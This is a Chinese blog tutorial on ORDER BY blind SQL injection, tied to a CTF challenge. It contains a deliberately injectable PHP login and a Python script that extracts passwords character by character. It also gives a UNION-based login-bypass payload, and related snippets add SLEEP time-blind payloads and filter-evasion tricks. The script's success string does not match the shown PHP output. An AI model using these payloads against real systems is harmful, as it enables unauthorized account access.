sql order by 大小比较盲注

最新推荐文章于 2024-06-10 15:55:04 发布
原创 最新推荐文章于 2024-06-10 15:55:04 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #mysql #数据库

本文深入探讨了SQL注入攻击原理,通过实例演示如何利用场景判断用户名和密码,详细讲解了使用orderby猜测密码值的方法,并提供了通用脚本及绕过技巧。

利用场景,先判断用户名再判断密码

 $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if(isset($row) && $row['username'] === 'admin'){
        if ($row['password']===md5($password)){
            echo "Login successful";
        }else{
            die("password error!");
        }
    }else{
        die("username error!");
    }

有如下表
在这里插入图片描述
我们尝试用order by去猜测password的值
在这里插入图片描述
这里很明显能看出来,当用联合查询出来的password值是1和2时,最终选择出来的就是1,2(挑选出来第一行),页面会显示用户名错误,当为3时则选择出来的是真正的用户名admin,这时显示的是密码错误,这样我们就可以根据回显一位一位的猜解password的值。
给出一个通用的脚本,大家可以根据过滤情况进行修改。

s = '0123456789:abcdefghijklmnopqrstuvwxyz{'
password=''
for i in range(50):
    for j in s:
        l=password+j
        data={
            'username':"'or 1 union select 1,'"+l+"' order by 2#",
            'password':''
            }
        r=requests.post(url,data=data)
        if "wrong pass!" in r.text:
            password+=chr(ord(j)-1)
            print(password)
            break

当然还有一个小技巧绕过

因为源码中要判断输入的密码的md5值与查询出来的密码是否一致。
这里直接构造
payload:username=' union select 'admin','c81e728d9d4c2f636f067f89cc14862c' #&password=123
其中c81e728d9d4c2f636f067f89cc14862c为123的md5值

大家可以参考 GXYCTF2019-BabySQli 进行练习。

yu22x
关注
SQL入进阶-order by
AkangBoy的博客
11-06 9966
本文从order by原理简介开始,详细描述了order by入原理以及多种入姿势,包含order by union select入、order by if()入、order by sleep()入、order by报错入。
order by 布尔与时间
weixin_72380152的博客
02-25 350
意使用时间时,因为if是在order by之后,而order by 会遍历每一行,都会执行一遍sleep(),但是这里也不能用子查询,跟在order by 之后无论if的条件判断正确yufou都会执行子查询里面的sleep().背景:因为order by ,limit无法使用预编译,所以有可能存在sql入漏洞。用python布尔。用python时间。以靶场第46关为例子。
利用order by 进行
aiquan9342的博客
10-21 284
0x01 利用场景 登录代码: $username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql="SELECT * FROM admin WHERE username='".$username."'"; ...
SQL入之order by脚本
dragon的博客
02-26 1120
在有的时候我们进行sql入时,源码的查询语句后面为order by;众所周知,order by 后面接的字段或者数字不一样,那么这个数据表的排序就会不同;我们恰恰就可以利用这点来进行入,对查询的数据的每个字符的ascii码进行比较判断(其判断返回值只会为True(真)和False(假)),将其返回值的放入rand()函数中 对数据表进行排序,当显示出现变化时则可以判断出我们所要数据的字符,在对其进行拼接即可,对此方法我们采用脚本来快速实现。
sql排序order by
qq_42833608的博客
10-09 505
弄个表造点数据,方便对照进行判断 order by 关键字用于排序查询 默认按照升序(asc)进行排列 降序要使用 desc 排序方式:数字按照大小 英文字母和汉字按照第一个字母 从 a~z 排列 语 法: select 表中字段 表名 order by 表中字段 asc/desc 将test 表中数据按照姓名进行升序排序 将test 表中 id,name,sex 字段对应的数据按照姓...
面向优快云编程之:数据库字符串类型按数值大小排序(order by)
遇见你是我最美丽的意外
01-22 1974
数据库字符串类型按数值大小排序(order by) 1. 需求 别人提供了一个数据库中的表,需要对某一列进行排序。 这个问题直接使用order by命令可以,不过由于不是数值类型,导致按ASCII码顺序进行排序。比如说:在表中我使用string类型存储年龄age,然后根据age进行排序: 可以看出,根本不是按数值大小排序的。 2. 解决方法 使用cast命令转换数据类型。 ...
结合order by 解CTF某题
aiquan9342的博客
10-21 261
真tmd不容易 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" typ...
SQL入——布尔
TGFXK的博客
03-21 466
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
SQL入—(一)布尔
xiaoyang886_的博客
06-10 919
id=1' order by 1--+没变化 id=1' order by 2--+没变化 id=1' order by 3--+没变化?and (ascii(substr(database(),1,1)))=115--+ 返回正常,说明数据库名称第一位是 s。
确认并利用 SQL 漏洞
2301_77324496的博客
11-04 376
在服务器端,sql 入和 sql 是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第一个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 入表单(SQL Injection)一模一样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后一个%匹配的是空字符,所以用户名是 dvwa@
sql入的分类总结
m_ing
05-10 1858
前言:之前对联合查询,报错入、布尔、延迟入。对这几种类型模糊不定,我也查阅了一些资料,做了一点总结,希望对大家有帮助! 对于SELECT语句,我们通常分其为两种情况:有回显和无回显。 有回显 什么是有回显?我们举个例子当我们看到一个url结尾是?id=1时,我们可以猜想到select * from articles where id=’$id 这时候页面将SQL语句返回的内容显示在了页面中(本例中是标题、内容、作者等信息),这种情况就叫有回显 对于有回显我们通常用:联合查询入法 联合查询入 其作
玩得一手好入之order by排序篇
weixin_34107955的博客
01-30 1132
看了之前Gr36_前辈在先知上的议题,其中有提到排序入,这个在最近经常遇到这样的问题,所以先总结下order by 排序入的知识。                             0×00 背景 看了之前Gr36_前辈在先知上的议题,其中有提到排序入,这个在最近经常遇到这样的问题,所以先总结下order by 排序入的知识。    0×01 环境信息 测试环境:操作系统ubunt...
CTF中几种通用的sql手法和入的一些tips
xuchen16的博客
10-09 2751
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的入方法都是。然而在过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的手法和一些小tips,希望能在今后大家的...
varchar类型的数字比较大小
热门推荐
myme95的博客
05-21 1万+
varchar类型的数字在mysql比较大小,或者用order by 排序的话,有时候会失效 最好的方法是转成float类型再进行比较 用cast(字段名 as 类型)函数做转换 如varchar类型的字段price,它要进行由低到高的排序,为了保证准确性,应该是这样写 order by cast(price as decimal) asc :在mysql中decimal即为flo...
@Order解使用说明
LSW1737554365的博客
11-03 671
但是,有时候,我们可能需要改变这个顺序,例如,当我们需要在一个Bean完成其初始化之前,先初始化另一个Bean时。在Java中,Spring框架提供了一种强大的机制,允许我们通过使用@Order解来控制Bean的初始化顺序。总的来说,@Order解是一个非常有用的工具,可以帮助我们更好地管理和维护复杂的依赖关系。在这个例子中,myBean1的@Order解值为1,而myBean2的@Order解值为2。如果两个Bean的@Order解值相同,那么它们的初始化顺序将保持不变。
Spring Aop切面类优先级@Order()
MrCollins的博客
10-13 2138
相同目标方法上同时存在多个切面时,切面的优先级控制切面的内外嵌套顺序。:@Order默认值为int类型的最大值。@Order(较小的数):优先级高。@Order(较大的数):优先级低。优先级高的切面:外面。优先级低的切面:里面。
Spring源码必备-@Order排序详解
03-06 4753
大家都知道Spring中可以使用@Order和@Priority来决定SpringBean的启动顺序,但是你知道他是怎么实现的吗? 下面我们就来看看Spring是怎么设计实现的。 一、如何使用 我们先看看Spring是如何使用的,然后再深入内部去看。 public class SpringApplication { private <T> Collection<T> getSpringFactoriesInstances(Class<T> type, Clas
切面的优先级(通过@Order解设置优先级)
weixin_44050355的博客
03-17 2715
决定先执行谁。。。。 基本类型的二进制最大(01111),最小值(1000)
Spring的@Order
ChineseSoftware的博客
01-20 2797
一、简述 解@Order或者接口Ordered的作用是定义Spring IOC容器中Bean的执行顺序的优先级,而不是定义Bean的加载顺序,Bean的加载顺序不受@OrderOrdered接口的影响。值越小拥有越高的优先级,可为负数。 例如: @Order(-1)优先于@Order(0) @Order(1)优先于@Order(2) 1️⃣@Order解源码解读 @Retention(RetentionPolicy.RUNTIME) @Target({ElementType.TYPE, Elemen
SQL入时order by 1之后400
最新发布
08-21
SQL入测试中,使用 `ORDER BY 1` 导致返回400错误,通常与请求格式、参数解析或后端逻辑处理有关,而非数据库执行层面的错误。以下是可能的原因及对应的解决方法: ### 原因分析 1. **请求参数格式不正确** 若入点位于URL参数中,例如 `?sort=1`,而测试者直接输入 `ORDER BY 1`,可能导致参数值不符合预期格式,从而触发400错误。这是因为服务器端可能期望一个整数,而非SQL语句片段。 2. **参数未正确编码** 在URL中直接使用特殊字符(如空格、`=`、`ORDER BY` 等)未进行URL编码,可能被服务器解析为非法请求,从而返回400错误。[^2] 3. **后端逻辑提前拦截请求** 某些Web框架或中间件在接收到非预期参数时,会在到达数据库层之前直接返回400错误,例如参数类型校验失败或路由匹配失败。 4. **输入被过滤或转义** 若存在基本的输入过滤机制(如黑名单、正则匹配),可能导致 `ORDER BY` 被识别为非法内容并被拒绝处理。 --- ### 解决方法 1. **使用数字代替完整SQL片段** 若入点为数字型参数(如 `ORDER BY $id`),直接传递数字(如 `?sort=1`)即可测试排序逻辑,无需入完整SQL语句。[^2] 2. **进行URL编码** 对入内容进行URL编码,例如将空格替换为 `%20`,将 `ORDER BY 1` 编码为 `ORDER%20BY%201`,确保请求能正确传递到后端处理逻辑。 3. **尝试技术** 若无法直接观察数据库响应,可使用时间(如 `ORDER BY IF(1=1, SLEEP(5), 1)`)探测后端逻辑是否执行了入语句。 4. **绕过简单过滤机制** 若存在关键字过滤,可以尝试使用大小写混合、释符绕过(如 `OrDer%20bY 1` 或 `ORDER/**/BY 1`)等方式进行测试。 5. **结合其他入技术** 若 `ORDER BY` 入受限,可尝试结合 `UNION SELECT` 或布尔技术,通过其他方式获取数据库信息。 --- ### 示例:URL编码后的入请求 ```http GET /example?sort=ORDER%20BY%201 ``` 若后端未严格过滤,该请求可能触发数据库排序逻辑,从而验证入点是否存在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值